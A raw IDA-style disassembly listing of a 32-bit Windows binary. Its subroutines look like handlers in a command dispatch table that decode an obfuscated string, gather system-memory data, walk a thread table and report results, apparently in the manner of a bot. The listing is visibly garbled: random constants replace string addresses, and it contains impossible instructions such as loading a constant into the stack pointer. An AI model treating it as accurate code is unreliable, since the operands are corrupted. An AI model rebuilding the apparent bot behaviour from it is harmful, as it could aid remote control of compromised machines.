; sub_40177B+232�j ...
call sub_40467F
retn 1Ch
sub_40177B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4019F3 proc near ; DATA XREF: .kSjx934:off_420AEC�o
push 694D38h
mov ecx, 5A534h
call sub_404635
cmp dword ptr [ebp+1Ch], 3
mov eax, [ebp+10h]
mov edi, [ebp+20h]
mov [ebp-4C4h], eax
mov eax, [ebp+18h]
mov [ebp-4C0h], eax
mov [ebp-4BCh], edi
jl loc_401BFF
mov ebx, 0E8AD29h
xor ebx, ebx
push esi
lea eax, [ebp-18Fh]
push ebx
push eax
mov [ebp-190h], bl
call sub_407B70
push esi
lea eax, [ebp-0CFh]
push ebx
push eax
mov [ebp-0D0h], bl
call sub_407B70
push dword ptr [edi+4]
lea edi, [ebp-190h]
call sub_41B7F9
push 745694h
lea esi, [ebp-0D0h]
mov ebx, offset aNbEdGzDdnbgNdZ ; "¡×¥¤Ð£§Ñ¤¤¡£Ð¤Ð§ÑÑ£¬¤Ó×ÖЬ ¢¢×¦ ÐЦ"...
call sub_4196D1
add esp, 20h
cmp byte ptr [ebp+8], 0
jz short loc_401A8F
cmp ds:byte_425222, 0
jz loc_401C15
loc_401A8F: ; CODE XREF: sub_4019F3+8D�j
lea ecx, [ebp-0D0h]
lea eax, [ebp-190h]
loc_401A9B: ; CODE XREF: sub_4019F3+C0�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_401AB9
test dl, dl
jz short loc_401AB5
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_401AB9
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_401A9B
loc_401AB5: ; CODE XREF: sub_4019F3+B0�j
xor eax, eax
jmp short loc_401ABE
; ---------------------------------------------------------------------------
loc_401AB9: ; CODE XREF: sub_4019F3+AC�j
; sub_4019F3+B8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401ABE: ; CODE XREF: sub_4019F3+C4�j
test eax, eax
jnz loc_401BF2
push 7A2B4Ah
push eax
lea eax, [ebp-4B8h]
push eax
call sub_407B70
push dword ptr [ebp-4C0h]
mov ecx, 47A2B4h
push esi
mov ebx, 0CABD15h
lea eax, [ebp-4B8h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-4B8h]
add esp, 1Ch
lea ecx, [eax+1]
loc_401B02: ; CODE XREF: sub_4019F3+114�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B02
push dword ptr [ebp-4C4h]
sub eax, ecx
push esi
mov [ebp+eax-4B8h], dl
lea eax, [ebp-3B8h]
push 22h
push eax
call sub_402AEE
lea eax, [ebp-3B8h]
add esp, 10h
lea ecx, [eax+1]
loc_401B33: ; CODE XREF: sub_4019F3+145�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B33
mov ebx, [ebp-4BCh]
push dword ptr [ebx+8]
sub eax, ecx
push esi
mov [ebp+eax-3B8h], dl
lea eax, [ebp-395h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-395h]
add esp, 10h
lea ecx, [eax+1]
loc_401B66: ; CODE XREF: sub_4019F3+178�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B66
push dword ptr [ebx+0Ch]
sub eax, ecx
push esi
mov [ebp+eax-395h], dl
lea eax, [ebp-295h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-295h]
add esp, 10h
lea ecx, [eax+1]
loc_401B93: ; CODE XREF: sub_4019F3+1A5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B93
sub eax, ecx
mov [ebp+eax-295h], dl
mov al, [ebp+8]
mov [ebp-192h], al
mov al, [ebp+0Ch]
push 8
mov [ebp-193h], al
mov byte ptr [ebp-195h], 1
mov byte ptr [ebp-194h], 1
call sub_40304B
pop ecx
mov [ebp-4BCh], eax
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_401C15
push 6D5E8Ah
lea ecx, [ebp-4B8h]
mov ecx, 2ED5E8h
mov esi, eax
call sub_4140AB
jmp short loc_401C15
; ---------------------------------------------------------------------------
loc_401BF2: ; CODE XREF: sub_4019F3+CD�j
push 1F6AF4h
push dword ptr [ebp-4C0h]
jmp short loc_401C05
; ---------------------------------------------------------------------------
loc_401BFF: ; CODE XREF: sub_4019F3+2E�j
push 4FB57Ah
push eax
loc_401C05: ; CODE XREF: sub_4019F3+20A�j
push dword ptr [ebp+0Ch]
push 67DABDh
call sub_417361
add esp, 10h
loc_401C15: ; CODE XREF: sub_4019F3+96�j
; sub_4019F3+1E4�j ...
call sub_40467F
retn 1Ch
sub_4019F3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C1D proc near ; DATA XREF: .kSjx934:off_420B04�o
var_118 = dword ptr -118h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 118h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_10]
push ebx
mov [ebp+var_118], eax
push esi
push edi
xor eax, eax
xor ecx, ecx
mov [ebp+var_14], cl
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
push 73ED5Eh
stosb
push ecx
lea eax, [ebp+var_113]
push eax
mov [ebp+var_114], cl
call sub_407B70
push ds:dword_4269BC
lea esi, [ebp+var_14]
call sub_418FC6
push 39F6AFh
lea esi, [ebp+var_114]
mov ebx, offset byte_425061
call sub_4196D1
mov eax, esi
push eax
push ds:dword_426594
lea eax, [ebp+var_14]
push eax
push 1CFB57h
push [ebp+var_118]
push [ebp+arg_4]
push 4E7DABh
call sub_417361
mov ecx, [ebp+var_4]
add esp, 30h
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 1Ch
sub_401C1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401CC0 proc near ; DATA XREF: .kSjx934:off_420BC4�o
var_444 = byte ptr -444h
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = byte ptr -438h
var_430 = dword ptr -430h
var_42C = dword ptr -42Ch
var_418 = byte ptr -418h
var_417 = byte ptr -417h
var_408 = byte ptr -408h
var_407 = byte ptr -407h
var_308 = byte ptr -308h
var_307 = byte ptr -307h
var_208 = byte ptr -208h
var_207 = byte ptr -207h
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 444h
mov eax, ds:dword_423064
xor eax, esp
mov [esp+444h+var_4], eax
mov eax, [ebp+arg_10]
push ebx
push esi
push edi
mov ebp, 0CE7DAh
push esi
mov [esp+454h+var_43C], eax
xor ebx, ebx
lea eax, [esp+454h+var_107]
push ebx
push eax
mov [esp+45Ch+var_108], 0
call sub_407B70
add esp, 0Ch
push esi
lea eax, [esp+454h+var_307]
push ebx
push eax
mov [esp+45Ch+var_308], bl
call sub_407B70
xor eax, eax
mov [esp+45Ch+var_418], bl
lea edi, [esp+45Ch+var_417]
stosd
stosd
stosd
stosw
add esp, 0Ch
push esi
stosb
lea eax, [esp+454h+var_407]
push ebx
push eax
mov [esp+45Ch+var_408], bl
call sub_407B70
add esp, 0Ch
push esi
lea eax, [esp+454h+var_207]
push ebx
push eax
mov [esp+45Ch+var_208], bl
call sub_407B70
add esp, 0Ch
push 8
pop ecx
xor eax, eax
lea edi, [esp+450h+var_438]
rep stosd
lea eax, [esp+450h+var_438]
mov ebx, 0A1CE7Dh
push eax
mov [esp+454h+var_440], ebx
call dword ptr ds:58E73Eh
mov edi, [esp+450h+var_430]
mov ecx, [esp+450h+var_42C]
shr edi, 14h
shr ecx, 14h
mov eax, edi
sub eax, ecx
push 1
mov ecx, ebx
lea esi, [esp+454h+var_108]
mov dword ptr [esp+454h+var_444], eax
call sub_418E51
pop ecx
call sub_41A391
push 1
push ebx
lea esi, [esp+458h+var_308]
call sub_418E1F
push ds:dword_4269BC
lea esi, [esp+45Ch+var_418]
call sub_418FC6
add esp, 0Ch
lea eax, [esp+450h+var_440]
push eax
lea eax, [esp+454h+var_408]
push eax
call dword ptr ds:6C739Fh
push ebx
lea eax, [esp+454h+var_208]
push eax
call dword ptr ds:7639CFh
call sub_418DA0
push ds:dword_4265AC
lea eax, [esp+454h+var_208]
push ds:dword_4265A8
push ds:dword_4265A4
push ds:dword_4265A0
push ds:dword_42659C
push ds:dword_426598
push eax
lea eax, [esp+46Ch+var_408]
push eax
mov eax, esi
push eax
lea eax, [esp+474h+var_308]
push eax
push edi
push dword ptr [esp+47Ch+var_444]
mov esi, 69D8E7h
push ds:dword_426BE8
lea eax, [esp+484h+var_108]
push esi
push ds:dword_426BEC
push eax
push 34EC73h
push [esp+494h+var_43C]
push [ebp+arg_4]
push 1A7639h
call sub_417361
push 0D3B1Ch
push 0
push esi
call sub_407B70
mov ecx, [esp+4ACh+var_4]
add esp, 5Ch
pop edi
pop esi
pop ebx
xor ecx, esp
call sub_402710
mov esp, ebp
pop ebp
retn 1Ch
sub_401CC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E82 proc near ; DATA XREF: .kSjx934:off_420BCC�o
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, [ebp+arg_10]
push esi
push edi
push ds:dword_4269BC
mov [ebp+var_14], 0
xor eax, eax
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
lea esi, [ebp+var_14]
stosb
call sub_418FC6
pop ecx
mov eax, esi
push eax
call dword ptr ds:469D8Eh
push 2
mov [ebp+var_18], eax
push 4
lea eax, [ebp+var_18]
push eax
call dword ptr ds:634EC7h
test eax, eax
jnz short loc_401EEF
mov eax, esi
push eax
push 31A763h
push ebx
push [ebp+arg_4]
push 58D3B1h
call sub_417361
add esp, 14h
jmp short loc_401F0B
; ---------------------------------------------------------------------------
loc_401EEF: ; CODE XREF: sub_401E82+50�j
push dword ptr [eax]
lea eax, [ebp+var_14]
push eax
push 2C69D8h
push ebx
push [ebp+arg_4]
push 5634ECh
call sub_417361
add esp, 18h
loc_401F0B: ; CODE XREF: sub_401E82+6B�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 1Ch
sub_401E82 endp
; =============== S U B R O U T I N E =======================================
sub_401F1C proc near ; DATA XREF: .kSjx934:off_420D1C�o
push 60h
mov esi, 6B1A7h
call sub_404635
mov eax, [ebp+18h]
mov [ebp-68h], eax
xor eax, eax
mov byte ptr [ebp-30h], 0
lea edi, [ebp-2Fh]
stosd
stosd
stosd
mov ebx, [ebp+20h]
stosw
and dword ptr [ebp-58h], 0
and dword ptr [ebp-48h], 0
stosb
xor eax, eax
mov byte ptr [ebp-20h], 0
lea edi, [ebp-1Fh]
stosd
stosd
stosd
stosw
stosb
or edi, 0FFFFFFFFh
cmp ds:byte_433945, 0
mov [ebp-50h], ebx
mov byte ptr [ebp-41h], 0
mov [ebp-5Ch], edi
mov [ebp-60h], edi
mov [ebp-64h], edi
mov [ebp-6Ch], edi
jnz short loc_401F83
call sub_41B775
test al, al
jz loc_402432
loc_401F83: ; CODE XREF: sub_401F1C+58�j
cmp ds:byte_4268B4, 0
jnz short loc_401F99
call sub_418D17
test al, al
jz loc_402432
loc_401F99: ; CODE XREF: sub_401F1C+6E�j
and dword ptr [ebp-54h], 0
mov ebp, 0EC5AC6h
mov eax, ecx
lea esi, [eax+1]
loc_401FA7: ; CODE XREF: sub_401F1C+90�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401FA7
jmp short loc_401FF6
; ---------------------------------------------------------------------------
loc_401FB0: ; CODE XREF: sub_401F1C+DC�j
mov edx, [ebx+4]
mov eax, ecx
loc_401FB5: ; CODE XREF: sub_401F1C+B1�j
mov cl, [eax]
cmp cl, [edx]
jnz short loc_401FD3
test cl, cl
jz short loc_401FCF
mov cl, [eax+1]
cmp cl, [edx+1]
jnz short loc_401FD3
inc eax
inc eax
inc edx
inc edx
test cl, cl
jnz short loc_401FB5
loc_401FCF: ; CODE XREF: sub_401F1C+A1�j
xor eax, eax
jmp short loc_401FD7
; ---------------------------------------------------------------------------
loc_401FD3: ; CODE XREF: sub_401F1C+9D�j
; sub_401F1C+A9�j
sbb eax, eax
sbb eax, edi
loc_401FD7: ; CODE XREF: sub_401F1C+B5�j
test eax, eax
jz short loc_401FFC
inc dword ptr [ebp-54h]
mov ecx, [ebp-54h]
imul ecx, 2Ch
lea ecx, dword_424528[ecx]
mov eax, ecx
lea esi, [eax+1]
loc_401FEF: ; CODE XREF: sub_401F1C+D8�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401FEF
loc_401FF6: ; CODE XREF: sub_401F1C+92�j
sub eax, esi
jnz short loc_401FB0
jmp short loc_402001
; ---------------------------------------------------------------------------
loc_401FFC: ; CODE XREF: sub_401F1C+BD�j
cmp [ebp-54h], edi
jnz short loc_40201E
loc_402001: ; CODE XREF: sub_401F1C+DE�j
push 7E2D63h
push dword ptr [ebp-68h]
push dword ptr [ebp+0Ch]
push 3F16B1h
call sub_417361
add esp, 10h
jmp loc_402432
; ---------------------------------------------------------------------------
loc_40201E: ; CODE XREF: sub_401F1C+E3�j
mov esi, [ebx+8]
mov eax, esi
mov edx, 247E2Dh
call sub_419044
test eax, eax
jz short loc_402043
push dword ptr [ebx+0Ch]
mov byte ptr [ebp-41h], 1
call sub_403ECE
pop ecx
mov [ebp-4Ch], eax
jmp short loc_4020A0
; ---------------------------------------------------------------------------
loc_402043: ; CODE XREF: sub_401F1C+113�j
push esi
call sub_403ECE
pop ecx
push 3
pop edx
cmp [ebp+1Ch], edx
mov [ebp-4Ch], eax
mov [ebp-48h], edx
jl short loc_402099
mov eax, edx
loc_40205A: ; CODE XREF: sub_401F1C+17B�j
mov ecx, [ebp-50h]
mov eax, [ecx+eax*4]
mov edi, eax
mov edx, 0A923F1h
mov ecx, edx
xor ebx, ebx
repe cmpsb
jz short loc_4020E7
mov edi, eax
mov edi, 0EF5247h
mov ecx, edx
xor ebx, ebx
repe cmpsb
jz short loc_402099
mov edi, eax
mov edx, 0C7BD49h
mov ecx, edx
xor eax, eax
repe cmpsb
jz short loc_4020ED
inc dword ptr [ebp-48h]
movzx eax, word ptr [ebp-48h]
cmp eax, [ebp+1Ch]
jle short loc_40205A
loc_402099: ; CODE XREF: sub_401F1C+13A�j
; sub_401F1C+160�j
mov dword ptr [ebp-48h], 1
loc_4020A0: ; CODE XREF: sub_401F1C+125�j
; sub_401F1C+1CF�j ...
xor eax, eax
loc_4020A2: ; CODE XREF: sub_401F1C+19C�j
cmp ds:byte_426D01[eax], 0
jz short loc_4020AE
inc dword ptr [ebp-58h]
loc_4020AE: ; CODE XREF: sub_401F1C+18D�j
add eax, 124h
and eax, 35EF52h
jbe short loc_4020A2
mov ecx, [ebp-58h]
mov edx, 235EF5h
sub eax, ecx
cmp eax, [ebp-4Ch]
jnb short loc_4020F6
push eax
push 11AF7Ah
push dword ptr [ebp-68h]
push dword ptr [ebp+0Ch]
push 48D7BDh
call sub_417361
add esp, 14h
jmp loc_402432
; ---------------------------------------------------------------------------
loc_4020E7: ; CODE XREF: sub_401F1C+151�j
and dword ptr [ebp-48h], 0
jmp short loc_4020A0
; ---------------------------------------------------------------------------
loc_4020ED: ; CODE XREF: sub_401F1C+16F�j
mov dword ptr [ebp-48h], 2
jmp short loc_4020A0
; ---------------------------------------------------------------------------
loc_4020F6: ; CODE XREF: sub_401F1C+1AB�j
add [ebp-4Ch], ecx
cmp byte ptr [ebp-41h], 0
jz loc_40221D
mov eax, [ebp-50h]
push dword ptr [eax+8]
lea eax, [ebp-30h]
push 246BDEh
push 0Fh
pop ebx
push ebx
push eax
call sub_402AEE
lea eax, [ebp-30h]
add esp, 10h
lea ecx, [eax+1]
loc_402124: ; CODE XREF: sub_401F1C+20D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402124
sub eax, ecx
mov [ebp+eax-30h], dl
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-64h]
push eax
lea eax, [ebp-60h]
push eax
lea eax, [ebp-5Ch]
push eax
lea eax, [ebp-30h]
push 5235EFh
push eax
call sub_4035E4
add esp, 18h
cmp dword ptr [ebp-5Ch], 0FFFFFFFFh
lea eax, [ebp-20h]
jnz short loc_40216C
push 691AF7h
push ebx
push eax
call sub_402AEE
add esp, 0Ch
jmp short loc_40217E
; ---------------------------------------------------------------------------
loc_40216C: ; CODE XREF: sub_401F1C+23D�j
push dword ptr [ebp-5Ch]
push 348D7Bh
push ebx
push eax
call sub_402AEE
add esp, 10h
loc_40217E: ; CODE XREF: sub_401F1C+24E�j
cmp dword ptr [ebp-60h], 0FFFFFFFFh
mov edi, 2B48D7h
mov esi, 4CED23h
lea eax, [ebp-20h]
jnz short loc_40219F
push eax
push edi
push ebx
push eax
call sub_402AEE
add esp, 10h
jmp short loc_4021B1
; ---------------------------------------------------------------------------
loc_40219F: ; CODE XREF: sub_401F1C+273�j
push dword ptr [ebp-60h]
push eax
push esi
lea eax, [ebp-20h]
push ebx
push eax
call sub_402AEE
add esp, 14h
loc_4021B1: ; CODE XREF: sub_401F1C+281�j
cmp dword ptr [ebp-64h], 0FFFFFFFFh
lea eax, [ebp-20h]
jnz short loc_4021C8
push eax
push edi
push ebx
push eax
call sub_402AEE
add esp, 10h
jmp short loc_4021DA
; ---------------------------------------------------------------------------
loc_4021C8: ; CODE XREF: sub_401F1C+29C�j
push dword ptr [ebp-64h]
push eax
push esi
lea eax, [ebp-20h]
push ebx
push eax
call sub_402AEE
add esp, 14h
loc_4021DA: ; CODE XREF: sub_401F1C+2AA�j
cmp dword ptr [ebp-6Ch], 0FFFFFFFFh
lea eax, [ebp-20h]
jnz short loc_4021F5
push eax
push 2E7691h
push ebx
push eax
call sub_402AEE
add esp, 10h
jmp short loc_40220B
; ---------------------------------------------------------------------------
loc_4021F5: ; CODE XREF: sub_401F1C+2C5�j
push dword ptr [ebp-6Ch]
push eax
push 573B48h
lea eax, [ebp-20h]
push ebx
push eax
call sub_402AEE
add esp, 14h
loc_40220B: ; CODE XREF: sub_401F1C+2D7�j
lea eax, [ebp-20h]
lea edx, [eax+1]
loc_402211: ; CODE XREF: sub_401F1C+2FA�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402211
jmp loc_4022F6
; ---------------------------------------------------------------------------
loc_40221D: ; CODE XREF: sub_401F1C+1E1�j
push ds:dword_4269BC
mov byte ptr [ebp-40h], 0
xor eax, eax
lea edi, [ebp-3Fh]
stosd
stosd
stosd
stosw
lea esi, [ebp-40h]
stosb
call sub_418FC6
xor eax, eax
lea edi, [ebp-30h]
stosd
stosd
stosd
stosd
mov eax, esi
push eax
push 6B9DA4h
push 0Fh
pop esi
lea eax, [ebp-30h]
push esi
push eax
call sub_402AEE
lea eax, [ebp-30h]
add esp, 14h
lea ecx, [eax+1]
loc_402261: ; CODE XREF: sub_401F1C+34A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402261
sub eax, ecx
mov [ebp+eax-30h], dl
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-64h]
push eax
lea eax, [ebp-60h]
push eax
lea eax, [ebp-5Ch]
push eax
lea eax, [ebp-30h]
push 75CED2h
push eax
call sub_4035E4
mov eax, [ebp-48h]
add esp, 18h
sub eax, 0
jz short loc_4022D4
dec eax
jz short loc_4022BA
dec eax
jnz short loc_4022E9
push dword ptr [ebp-64h]
lea eax, [ebp-20h]
push dword ptr [ebp-60h]
push dword ptr [ebp-5Ch]
push 7AE769h
push esi
push eax
call sub_402AEE
add esp, 18h
jmp short loc_4022E9
; ---------------------------------------------------------------------------
loc_4022BA: ; CODE XREF: sub_401F1C+37C�j
push dword ptr [ebp-60h]
lea eax, [ebp-20h]
push dword ptr [ebp-5Ch]
push 3D73B4h
push esi
push eax
call sub_402AEE
add esp, 14h
jmp short loc_4022E9
; ---------------------------------------------------------------------------
loc_4022D4: ; CODE XREF: sub_401F1C+379�j
push dword ptr [ebp-5Ch]
lea eax, [ebp-20h]
push 1EB9DAh
push esi
push eax
call sub_402AEE
add esp, 10h
loc_4022E9: ; CODE XREF: sub_401F1C+37F�j
; sub_401F1C+39C�j ...
lea eax, [ebp-20h]
lea edx, [eax+1]
loc_4022EF: ; CODE XREF: sub_401F1C+3D8�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4022EF
loc_4022F6: ; CODE XREF: sub_401F1C+2FC�j
sub eax, edx
cmp byte ptr [ebp-41h], 0
mov byte ptr [ebp+eax-20h], 0
mov eax, [ebp-50h]
jz short loc_40230B
push dword ptr [eax+0Ch]
jmp short loc_40230E
; ---------------------------------------------------------------------------
loc_40230B: ; CODE XREF: sub_401F1C+3E8�j
push dword ptr [eax+8]
loc_40230E: ; CODE XREF: sub_401F1C+3ED�j
call sub_403ECE
push eax
mov eax, [ebp-54h]
imul eax, 2Ch
push ds:dword_424548[eax]
lea eax, [ebp-20h]
push eax
push 0F5CEDh
push dword ptr [ebp-68h]
push dword ptr [ebp+0Ch]
push 47AE76h
call sub_417361
add esp, 20h
call sub_4192FB
mov ecx, [ebp-4Ch]
cmp [ebp-58h], ecx
jnb loc_402432
mov eax, [ebp-58h]
imul eax, 124h
sub ecx, [ebp-58h]
mov [ebp-50h], eax
mov [ebp-4Ch], ecx
mov esi, eax
loc_402361: ; CODE XREF: sub_401F1C+510�j
push 63D73Bh
lea ebx, dword_426CF0[esi]
lea edi, [ebx-100h]
push 0
push edi
call sub_407B70
lea eax, [ebp-30h]
push eax
push 71EB9Dh
push 0Fh
push ebx
call sub_402AEE
mov eax, ebx
add esp, 1Ch
lea ecx, [eax+1]
loc_402393: ; CODE XREF: sub_401F1C+47C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402393
push dword ptr [ebp-68h]
sub eax, ecx
mov byte ptr ds:dword_426CF0[esi+eax], dl
mov al, [ebp-41h]
push 78F5CEh
mov [ebx+12h], al
mov eax, [ebp-48h]
push 3C7AE7h
push edi
mov [ebx+18h], eax
call sub_402AEE
mov eax, edi
add esp, 10h
lea ecx, [eax+1]
loc_4023CA: ; CODE XREF: sub_401F1C+4B3�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4023CA
sub eax, ecx
mov ds:byte_426BF0[esi+eax], dl
mov al, [ebp+0Ch]
mov [ebx+10h], al
mov eax, [ebp-54h]
push 8
mov byte ptr [ebx+11h], 1
mov [ebx+14h], eax
call sub_40304B
pop ecx
mov [ebp-58h], eax
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_402415
mov ecx, edi
push 5E3D73h
mov esi, 25E3D7h
mov esi, eax
call sub_4140AB
mov esi, [ebp-50h]
jmp short loc_402417
; ---------------------------------------------------------------------------
loc_402415: ; CODE XREF: sub_401F1C+4DF�j
xor eax, eax
loc_402417: ; CODE XREF: sub_401F1C+4F7�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [eax]
add esi, 124h
dec dword ptr [ebp-4Ch]
mov [ebx+20h], eax
mov [ebp-50h], esi
jnz loc_402361
loc_402432: ; CODE XREF: sub_401F1C+61�j
; sub_401F1C+77�j ...
call sub_40467F
retn 1Ch
sub_401F1C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40243A proc near ; DATA XREF: .kSjx934:off_420D24�o
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 1Ch
and [esp+1Ch+var_1C], 0
push ebx
push esi
mov esi, 4CD78Fh
push edi
mov [esp+28h+var_10], ebx
loc_402453: ; CODE XREF: sub_40243A+83�j
; sub_40243A+A0�j ...
mov eax, ds:dword_433C4C
mov eax, [eax]
mov [esp+28h+var_14], eax
mov [esp+28h+var_18], ebx
loc_402462: ; CODE XREF: sub_40243A+67�j
mov eax, ds:dword_433C4C
lea edi, [esp+28h+var_10]
lea esi, [esp+28h+var_18]
mov [esp+28h+var_C], eax
call sub_40166F
test al, al
jz short loc_4024F5
mov esp, 0D735Eh
call sub_40164F
mov esi, eax
add esi, 5
push 8
pop ecx
xor eax, eax
repe cmpsb
lea esi, [esp+28h+var_18]
jz short loc_4024A3
lea edi, [esp+28h+var_8]
call sub_40168C
jmp short loc_402462
; ---------------------------------------------------------------------------
loc_4024A3: ; CODE XREF: sub_40243A+5C�j
call sub_40164F
mov edi, [eax+40h]
lea esi, [esp+28h+var_18]
call sub_40164F
mov eax, [eax]
call sub_414023
test al, al
jz short loc_402453
xor eax, eax
xor ecx, ecx
loc_4024C3: ; CODE XREF: sub_40243A+9E�j
cmp ds:dword_426D10[ecx], edi
jz short loc_4024DF
add ecx, 124h
inc eax
cmp ecx, 0CD50h
jbe short loc_4024C3
jmp loc_402453
; ---------------------------------------------------------------------------
loc_4024DF: ; CODE XREF: sub_40243A+8F�j
inc [esp+28h+var_1C]
imul eax, 124h
mov ds:byte_426D01[eax], 0
jmp loc_402453
; ---------------------------------------------------------------------------
loc_4024F5: ; CODE XREF: sub_40243A+40�j
push [esp+28h+var_1C]
push 6B9AFh
push [ebp+arg_10]
push [ebp+arg_4]
push offset byte_435CD7
call sub_417361
add esp, 14h
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 1Ch
sub_40243A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=188h
sub_40251A proc near ; DATA XREF: .kSjx934:off_420D2C�o
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
lea ebp, [esp-188h]
sub esp, 208h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+188h+var_4], eax
mov eax, [ebp+188h+arg_10]
push esi
push edi
mov esi, 290D73h
push esi
mov [ebp+188h+var_208], eax
lea eax, [ebp+188h+var_203]
push 0
push eax
mov [ebp+188h+var_204], 0
call sub_407B70
push 1486B9h
lea eax, [ebp+188h+var_204]
push esi
push eax
xor edi, edi
call sub_402AEE
add esp, 18h
xor eax, eax
loc_40256B: ; CODE XREF: sub_40251A+7E�j
push ds:dword_42454C[eax]
lea eax, dword_424528[eax]
push eax
lea eax, [ebp+188h+var_204]
push eax
push 0A435Ch
push esi
push eax
call sub_402AEE
add esp, 18h
inc edi
mov eax, edi
imul eax, 2Ch
cmp ds:dword_424548[eax], 0
jnz short loc_40256B
lea eax, [ebp+188h+var_204]
push eax
push 521AEh
push esi
push eax
call sub_402AEE
push ds:dword_43394C
lea eax, [ebp+188h+var_204]
push eax
push offset byte_4290D7
push esi
push eax
call sub_402AEE
push ds:dword_433940
lea eax, [ebp+188h+var_204]
push eax
push 61486Bh
push esi
push eax
call sub_402AEE
add esp, 38h
lea eax, [ebp+188h+var_204]
pop edi
lea edx, [eax+1]
pop esi
loc_4025E1: ; CODE XREF: sub_40251A+CC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4025E1
sub eax, edx
mov [ebp+eax+188h+var_204], cl
lea eax, [ebp+188h+var_204]
push eax
push 70A435h
push [ebp+188h+var_208]
push [ebp+188h+arg_4]
push 38521Ah
call sub_417361
mov ecx, [ebp+188h+var_4]
xor ecx, ebp
add esp, 14h
call sub_402710
add ebp, 188h
leave
retn 1Ch
sub_40251A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402624 proc near ; CODE XREF: sub_41B1A0+A6�p
jmp dword ptr ds:5C290Dh
sub_402624 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40262A proc near ; CODE XREF: sub_41B1A0+149�p
jmp dword ptr ds:6E1486h
sub_40262A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402630 proc near ; CODE XREF: sub_41B1A0+76�p
; sub_41B1A0+B9�p ...
jmp dword ptr ds:370A43h
sub_402630 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402636 proc near ; CODE XREF: sub_41B1A0+C8�p
; sub_41B1A0+1C0�p ...
jmp dword ptr ds:5B8521h
sub_402636 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40263C proc near ; CODE XREF: sub_41B1A0+1B1�p
jmp dword ptr ds:2DC290h
sub_40263C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402642 proc near ; CODE XREF: sub_41A9DE+B2�p
jmp dword ptr ds:16E148h
sub_402642 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402648 proc near ; CODE XREF: sub_416F86+24�p
; sub_416F86+2F�p ...
jmp sub_40304B
sub_402648 endp
; =============== S U B R O U T I N E =======================================
sub_40264D proc near ; DATA XREF: .kSjx934:004212A4�o
mov dword ptr [ecx], offset off_41D338
jmp sub_40109A
sub_40264D endp
; ---------------------------------------------------------------------------
loc_402658: ; DATA XREF: .kSjx934:off_41D338�o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D338
call sub_40109A
test byte ptr [esp+8], 1
jz short loc_402674
push esi
call sub_402F6D
pop ecx
loc_402674: ; CODE XREF: .kSjx934:0040266B�j
